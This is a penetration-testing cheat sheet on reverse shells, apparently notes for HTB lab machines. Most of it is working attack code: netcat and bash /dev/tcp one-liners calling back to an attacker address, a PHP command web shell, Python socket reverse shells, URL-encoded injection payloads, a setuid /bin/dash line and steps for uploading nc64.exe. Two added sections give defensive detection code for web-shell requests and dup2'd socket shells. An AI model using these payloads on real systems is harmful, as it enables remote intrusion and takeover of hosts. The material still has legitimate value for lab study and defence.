# Shells

## Links

* Web
  * [gtfobins.github.io](https://gtfobins.github.io)
  * [PentestMonkey.net\_ReverseShells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
  * [Reverse Shell Generator: Suggestion Tool](https://github.com/mthbernardes/rsg)
  * [Reverse-shells-one-liners](http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html)
* Gitbook
  * [MetasploitVenom](/03-getting-in/03-metasploit.md#venom)
  * [PrivEscVenom](/07-win-privesc/win-privesc.md#basic-venom-reverse-shell)
  * [FtpHttpVulnWebshell](/03-getting-in/ftp.md#ftphttp-vulnerability)

## Basics

* Host: set up the listener that will catch the reverse shell
  * nc -nvlp 1234
* Target: upload your reverse shell, browse to it, execute it, and it connects back
  * [http://rhost/404.php](http://192.168.50.102/404.php)
* Example: BashedHTB sends a **php reverse shell** with wget

## Easy Test Connect

```
# Target side (pick one; $MyIP is the listener/attacker address)
nc -e /bin/bash $MyIP 4444
netcat -e /bin/bash $MyIP 4444
bash -i >& /dev/tcp/$MyIP/4444 0>&1

# Listener side
nc -nlvp 4444
```

## PHP web shell

* Upload this simple 'shell.php' and call it with the parameter 'cmd=uname'
* You may need to upload it as 'shell.php3' to get past an extension block/filter.
* REF: [PhpTricks](/04-webapps/php-tricks.md), [FtpHttpVuln](/03-getting-in/ftp.md#scenario-ftp-http)

```php
<?php
  system($_GET["cmd"]);
?>
```

Execute (the space in the command is URL-encoded as %20):

```
http://abc.so/upload/shell.php?cmd=uname%20-a
```
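Added detection example (not part of the original page): a scan over web-server access logs for requests that look like calls to an uploaded command shell such as the one above, including the 'shell.php3' extension variant. The log lines, the upload directories and the parameter names are constructed assumptions.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not real traffic).
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /upload/shell.php?cmd=uname%20-a HTTP/1.1" 200 88',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /upload/shell.php3?cmd=id HTTP/1.1" 200 40',
    '10.0.0.7 - - [01/Jan/2024:10:00:11 +0000] "GET /upload/photo.jpg HTTP/1.1" 200 9000',
]

# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# .php plus the alternate extensions (php3, phtml) that a naive ".php" blocklist lets through
PHP_EXT = re.compile(r"\.(php\d?|phtml)$", re.IGNORECASE)
CMD_PARAMS = {"cmd", "c", "exec", "command"}        # assumed common web-shell parameter names
UPLOAD_DIRS = ("/upload/", "/uploads/", "/files/")  # assumed upload locations


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a hit dict for a web-shell-like request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not (parts.path.startswith(UPLOAD_DIRS) and PHP_EXT.search(parts.path)):
        return None
    qs = parse_qs(parts.query)  # parse_qs already percent-decodes the values
    used = sorted(CMD_PARAMS.intersection(qs))
    if not used:
        return None
    return {"ip": m.group("ip"), "path": parts.path, "param": used[0], "cmd": qs[used[0]][0]}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify over every line and keep the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]
```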

## Python

```python
#!/usr/bin/env python
import os
import sys

try:
    # os.system('/usr/bin/touch /tmp/hello')                       # test: confirm the script runs as root
    # os.system('bash -c "bash -i >& /dev/tcp/$MyIP/4444 0>&1"')   # reverse shell
    os.system('chmod 4755 /bin/dash')                              # rootbash: setuid shell
except Exception:
    sys.exit()
```

This worked for htb-bashed, where a root process auto-executes python scripts:

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.15",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```

Script injected into the request to http://10.10.10.168:8080/ (the trailing `#` comments out the rest of the injected line; the request line still needs ` HTTP/1.1` after the payload):

```python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.15.30",51000));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")#
```

Script/Shell (privesc):

```python
#!/usr/bin/python
import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.52",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```

#### By Burp

```
Readable:
/'\nimport socket,subprocess,os;\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\ns.connect((\"10.10.15.30\",51000));\nos.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);\nimport pty;\npty.spawn(\"/bin/bash\")#

Web-Encoded:
/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1
```

#### Browser

```
http://10.10.10.168:8080/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1
```

* Remember to include the trailing `HTTP/1.1`
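Added detection example (not part of the original page): every python shell above works by dup2'ing one socket onto fds 0, 1 and 2, so on the host such a process shows stdin/stdout/stderr all pointing at the same `socket:[inode]`. This check parses /proc-style data to flag those processes and resolves the peer through /proc/net/tcp; the FDS and PROC_NET_TCP samples are constructed stand-ins for readlink on /proc/<pid>/fd and for the real file.

```python
import re
from typing import Dict, List, Tuple

# Constructed stand-ins for readlink("/proc/<pid>/fd/<n>"), one dict per pid (not a real host).
FDS = {
    1337: {0: "socket:[91234]", 1: "socket:[91234]", 2: "socket:[91234]"},  # dup2'd shell
    2001: {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"},              # normal tty shell
    2002: {0: "pipe:[555]", 1: "socket:[91300]", 2: "/dev/null"},            # only stdout on a socket
}
# Constructed /proc/net/tcp: addresses are little-endian hex, ports hex, st 01 = ESTABLISHED.
PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0F0A0A0A:A3B4 0F0E0A0A:15B3 01 00000000:00000000 00:00000000 00000000  1000        0 91234 1 0000000000000000 20 4 30 10 -1
"""


def parse_hex_endpoint(field: str) -> Tuple[str, int]:
    """Decode a /proc/net/tcp 'AABBCCDD:PPPP' field (IPv4 bytes reversed, hex port)."""
    addr, port = field.split(":")
    octets = [int(addr[i:i + 2], 16) for i in (6, 4, 2, 0)]
    return ".".join(map(str, octets)), int(port, 16)


def tcp_inode_table(text: str) -> Dict[str, Tuple[str, int, str]]:
    """Map socket inode -> (remote_ip, remote_port, state) for each /proc/net/tcp row."""
    table = {}
    for line in text.splitlines()[1:]:  # skip the header row
        cols = line.split()
        if len(cols) < 10:
            continue
        rip, rport = parse_hex_endpoint(cols[2])
        table[cols[9]] = (rip, rport, cols[3])
    return table


def find_stdio_on_socket(fds: Dict[int, Dict[int, str]], tcp_text: str) -> List[Tuple[int, str, int]]:
    """Flag pids whose fds 0, 1 and 2 are all the same socket, and resolve its peer."""
    inodes = tcp_inode_table(tcp_text)
    hits = []
    for pid, links in fds.items():
        targets = {links.get(n, "") for n in (0, 1, 2)}
        if len(targets) != 1:
            continue
        m = re.fullmatch(r"socket:\[(\d+)\]", targets.pop())
        if not m:
            continue
        rip, rport, _state = inodes.get(m.group(1), ("?", 0, "?"))
        hits.append((pid, rip, rport))
    return hits
```

On a live host, replace the constructed dicts with os.readlink over /proc/<pid>/fd/0..2 and the contents of /proc/net/tcp (and /proc/net/tcp6 for IPv6 peers).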

## Bash Reverse

* REF: [ApacheJamesEmail](/04-webapps/apache.md#apache-james-server-2-3-2)

```
bash -i >& /dev/tcp/192.168.1.26/53 0>&1

payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'
```

## Powershell Reverse

* [WindowsPrivEsc-Powershell](/07-win-privesc/win-kernelexp.md#juicy-potato-powershell)

## netcat

* Create a python reverse shell file
* Listener #1: serve the rshell file with `<`
* Listener #2: wait for the incoming shell
* LFI: execute nc to pull the rshell file and pipe it into python

```
rce > nc > python > nc/rshell

Python Reverse Shell
vim cmd  ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..send/share the file
nc -nvlp 1234         ..catch shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok pull file, python execute
connected!
```

## Windows netcat

* A Windows target might not have netcat
* Download and send nc64.exe (assuming the target is 64-bit)
* Execute your nc64.exe to send a reverse shell back to yourself
* Ex: [DrupalPhpVuln](/04-webapps/drupal.md#reverse)

```
Download 64-bit netcat
nc64.exe: upload and execute

http://10.x.x.x/ippsec.php?fupload=nc64.exe
http://10.x.x.x/ippsec.php?fexec=nc64.exe -e cmd $MyIP 8081

# listener
nc -nvlp 8081
```
